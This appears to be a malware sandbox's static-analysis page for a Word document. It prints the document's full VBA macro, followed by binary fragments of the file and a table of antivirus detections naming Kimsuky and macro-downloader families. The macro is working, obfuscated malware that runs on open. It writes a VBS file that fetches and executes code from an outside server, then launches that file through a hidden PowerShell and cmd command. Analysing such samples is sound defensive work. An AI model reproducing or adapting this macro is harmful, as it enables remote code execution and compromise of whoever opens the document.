Static | ZeroBOX

Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function GenPlace() Set obTmp = Application.Templates Dim tmp As Template For Each tmp In obTmp If tmp.Type = 1 Then GenPlace = tmp.Path Exit For End If Next End Function Sub Weed(p) Application.ActiveWindow.View.Type = wdPrintView Set wnd = ActiveDocument wnd.Unprotect p End Sub Sub Reserve(pth) docTempString = "Next:Set mx = Crea" xnTntCount = "teObject(""Micr" docTempString = docTempString & xnTntCount xnTntCount = "osoft.XMLHT" docTempString = docTempString & xnTntCount xnTntCount = docTempString & "TP""):mx.ope" docTempString = xnTntCount & "n ""GE" Documents.Add xnTntCount = docTempString & "T"", ""ht" docTempString = xnTntCount & "tp://" xnTntCount = docTempString & "koreaillmin.mypressonline.com/file/upload" Set ad = ActiveDocument docTempString = xnTntCount & "/list" xnTntCount = docTempString & ".ph" docTempString = xnTntCount & "p?quer" xnTntCount = docTempString & "y=1"", False:mx.Se" docTempString = xnTntCount & "nd:Ex" xnTntCount = docTempString & "ecute(mx.res" docTempString = xnTntCount & "ponseText)" xnTntCount = "me " & docTempString docTempString = "or Resu" & xnTntCount xnTntCount = "On Err" & docTempString ad.Range.Text = xnTntCount fval = wdFormatText ad.SaveAs2 FileName:=pth, FileFormat:=fval ad.Close End Sub Sub Review(vmod) On Error Resume Next Set wnd = ActiveWindow Set sel = Selection wnd.View.SeekView = vmod rval = False sel.WholeStory hm = False sel.Font.Hidden = hm rval = True If rval = True Then sel.Collapse End If End Sub Sub ViewContent() Mode = 10 Do Until Mode < 0 Review (Mode) Mode = Mode - 1 Loop End Sub Sub tele(Param As String) With CreateObject("WScript.Shell") .Run Param, 0, True End With End Sub Sub AutoOpen() On Error Resume Next help2 = "Sc" help1 = "cript.Sh" Set hope = CreateObject("W" & help2 & help1 & "ell") myject2 = "32_pr" myject = "mts" pw = "1qaz2wsx" mysject = "winmg" mysject1 = "win" myject = mysject & myject & ":" & mysject1 Weed pw myject3 = "ocess" myject = myject & myject2 & myject3 Set adom = ActiveDocument ins = "w" ts = "xe //e:vb" With adom.Shapes("myShape1") cd = " //b " .Fill.Solid mt = "script" Set wm = GetObject(myject) ts = ts & mt ins = ins & mt & ".e" pth = Templates(1).Path & "\version.v" pth = pth & "bs" cd = ins & ts & cd .Delete End With ViewContent Reserve pth ts1 = "//e:vbscr" mt1 = "ipt" cd1 = " //b " bigstr = "p -w hi" myStr = "pow" smStr = "e -no" myStr = myStr & "ershe" youStr = "ll.ex" bigstr = bigstr & "dden -c " smStr = smStr & bigstr myStr = myStr & youStr bigstr = myStr & smStr shpe_reg = "cm" depStep = shpe_reg & "d.ex" shpe_reg = "e /c " depStep = depStep & shpe_reg bigstr = depStep & pth 'wm.Create bigStr tele (bigstr) adom.Save End Sub

[Content_Types].xml

_rels/.rels

A$>"f3

word/_rels/document.xml.rels

N<I\lOj

word/document.xml

P0 %'SS

919%&RIi<x_

Tjr~NJ

dvl!=9

Jjz:>)]YHe

J~sv/&

,4,K^+iY[7

Ohi1P;*

%JsX%Hs

]:D2jiK

HR;\F

QWatt

'2l}Mx

k:xf\4

I<luE8juE$lu

kScw71

<f%VpM

S0${Eu]

;.Q_)^

.e[yd8

\8'8F*o

9\(V/o

M,c+-c

Y^ c@

2Z{)sO

D__?7bY=

fuoVq7

[ s<8<2

R;9@sg

\5wMmS

"|A4/,

word/endnotes.xml

Ss40Bc

word/footnotes.xml

word/theme/theme1.xml

#am j ?

gPwF=h

AH8N,J

)\JyNG>

word/media/image1.png

IDATx^

v\__///

H(kiNy

Ptpe#N

`LV?+5

Z1|/UJ

fpGWOo

!z32vIC

'SWPjo!']K

o7R8#m1

~-Y*-

9n\u-8Yd+

`fJ|ML

Tu9Z%:p

++REw'?

KCZ[=F~

Y{\{<W

2%(sv~

v_l6/.

noMM>^XX

V9#10[Q1

^6/OO"

qhu~vFs

~3&p4V

F}kwswok

Z=?k([

X8d@A2

word/embeddings/oleObject1.bin

~ob?{+

TYV5%Uf*1G

bW\}y|z*

aq."5Y

%K`"DC

<:"NI/0

Z:i?No

sMI~/,

<:JGbeU

n1uaaAq

DZ^^f.

S!ybv:

`?SXQ|

DQqV,:

52>uxy

fAmn<2~

/mI(K\a

AA6S{qe[

word/vbaProject.bin

l>.hznzV

{amwZ;

!OaO@G

gD"8Oq

?ed/]x

,[ZRl!

Fa~}@\C

Uk6:Ck

hiumqiK

Tk#7t;

OH$4!)tA

()/uP

'7\*/}

word/_rels/vbaProject.bin.relsl

1tiJGI

word/vbaData.xml

word/settings.xml

fK82gR

ZfP]Y

<=E1GOe2

}?XIL\AZM

word/stylesWithEffects.xml

DEW=_D

H\E"\Y

f",<,n

word/styles.xml

]b9_/R

2dXHnNP

word/fontTable.xml

/cF` ve'

docProps/core.xml

word/webSettings.xml

docProps/app.xml

[Content_Types].xmlPK

_rels/.relsPK

word/_rels/document.xml.relsPK

word/document.xmlPK

word/endnotes.xmlPK

word/footnotes.xmlPK

word/theme/theme1.xmlPK

word/media/image1.pngPK

word/embeddings/oleObject1.binPK

word/vbaProject.binPK

word/_rels/vbaProject.bin.relsPK

word/vbaData.xmlPK

word/settings.xmlPK

word/stylesWithEffects.xmlPK

word/styles.xmlPK

word/fontTable.xmlPK

docProps/core.xmlPK

word/webSettings.xmlPK

docProps/app.xmlPK

Antivirus	Signature
Lionic	Clean
tehtris	Clean
ClamAV	Doc.Downloader.Valyria-10021468-0
CMC	Clean
CAT-QuickHeal	Clean
Skyhigh	Clean
McAfee	Clean
Malwarebytes	Clean
Zillya	Clean
Sangfor	Malware.Generic-Macro.Save.a893fb17
K7AntiVirus	Clean
Alibaba	Clean
K7GW	Clean
Cybereason	Clean
Baidu	Clean
VirIT	Clean
Symantec	Clean
Elastic	malicious (high confidence)
ESET-NOD32	VBA/Kimsuky.K
TrendMicro-HouseCall	Clean
Avast	VBS:Obfuscated-gen [Trj]
Cynet	Malicious (score: 99)
Kaspersky	Clean
BitDefender	GT:VB.EmoooDldr.4.B03C1B6E
NANO-Antivirus	Trojan.Script.Dnldr.elyanu
ViRobot	Clean
MicroWorld-eScan	GT:VB.EmoooDldr.4.B03C1B6E
Tencent	Clean
Sophos	Clean
F-Secure	Heuristic.HEUR/Macro.Downloader.PBMD.Gen
DrWeb	modification of W97M.Suspicious.1
VIPRE	GT:VB.EmoooDldr.4.B03C1B6E
TrendMicro	HEUR_VBA.O2
FireEye	GT:VB.EmoooDldr.4.B03C1B6E
Emsisoft	GT:VB.EmoooDldr.4.B03C1B6E (B)
GData	GT:VB.EmoooDldr.4.B03C1B6E
Jiangmin	Clean
Varist	Clean
Avira	HEUR/Macro.Downloader.PBMD.Gen
MAX	malware (ai score=81)
Antiy-AVL	Trojan/Macro.Kimsuky.k
Kingsoft	Clean
Microsoft	Clean
Gridinsoft	Clean
Xcitium	Clean
Arcabit	HEUR.VBA.CG.2
SUPERAntiSpyware	Clean
ZoneAlarm	Clean
Avast-Mobile	Clean
Google	Detected.Heuristic.Script
AhnLab-V3	Clean
Acronis	Clean
ALYac	GT:VB.EmoooDldr.4.B03C1B6E
TACHYON	Suspicious/WOX.XSR.Gen
VBA32	Clean
Zoner	Clean
Rising	Trojan.Kimsuky/VBA!8.1330D (TOPIS:E0:6BMNDE24csN)
Yandex	Clean
Ikarus	Clean
MaxSecure	Clean
Fortinet	Clean
BitDefenderTheta	Clean
AVG	VBS:Obfuscated-gen [Trj]
Panda	Clean
CrowdStrike	Clean
alibabacloud	Clean

Antivirus

Signature

Lionic

Clean

tehtris

Clean

ClamAV

Doc.Downloader.Valyria-10021468-0

CMC

Clean

CAT-QuickHeal

Clean

Skyhigh

Clean

McAfee

Clean

Malwarebytes

Clean

Zillya

Clean

Sangfor

Malware.Generic-Macro.Save.a893fb17

K7AntiVirus

Clean

Alibaba

Clean

K7GW

Clean

Cybereason

Clean

Baidu

Clean

VirIT

Clean

Symantec

Clean

Elastic

malicious (high confidence)

ESET-NOD32

VBA/Kimsuky.K

TrendMicro-HouseCall

Clean

Avast

VBS:Obfuscated-gen [Trj]

Cynet

Malicious (score: 99)

Kaspersky

Clean

BitDefender

GT:VB.EmoooDldr.4.B03C1B6E

NANO-Antivirus

Trojan.Script.Dnldr.elyanu

ViRobot

Clean

MicroWorld-eScan

GT:VB.EmoooDldr.4.B03C1B6E

Tencent

Clean

Sophos

Clean

F-Secure

Heuristic.HEUR/Macro.Downloader.PBMD.Gen

DrWeb

modification of W97M.Suspicious.1

VIPRE

GT:VB.EmoooDldr.4.B03C1B6E

TrendMicro

HEUR_VBA.O2

FireEye

GT:VB.EmoooDldr.4.B03C1B6E

Emsisoft

GT:VB.EmoooDldr.4.B03C1B6E (B)

GData

GT:VB.EmoooDldr.4.B03C1B6E

Jiangmin

Clean

Varist

Clean

Avira

HEUR/Macro.Downloader.PBMD.Gen

MAX

malware (ai score=81)

Antiy-AVL

Trojan/Macro.Kimsuky.k

Kingsoft

Clean

Microsoft

Clean

Gridinsoft

Clean

Xcitium

Clean

Arcabit

HEUR.VBA.CG.2

SUPERAntiSpyware

Clean

ZoneAlarm

Clean

Avast-Mobile

Clean

Google

Detected.Heuristic.Script

AhnLab-V3

Clean

Acronis

Clean

ALYac

GT:VB.EmoooDldr.4.B03C1B6E

TACHYON

Suspicious/WOX.XSR.Gen

VBA32

Clean

Zoner

Clean

Rising

Trojan.Kimsuky/VBA!8.1330D (TOPIS:E0:6BMNDE24csN)

Yandex

Clean

Ikarus

Clean

MaxSecure

Clean

Fortinet

Clean

BitDefenderTheta

Clean

AVG

VBS:Obfuscated-gen [Trj]

Panda

Clean

CrowdStrike

Clean

alibabacloud

Clean

Static Analysis

Original

Deobfuscated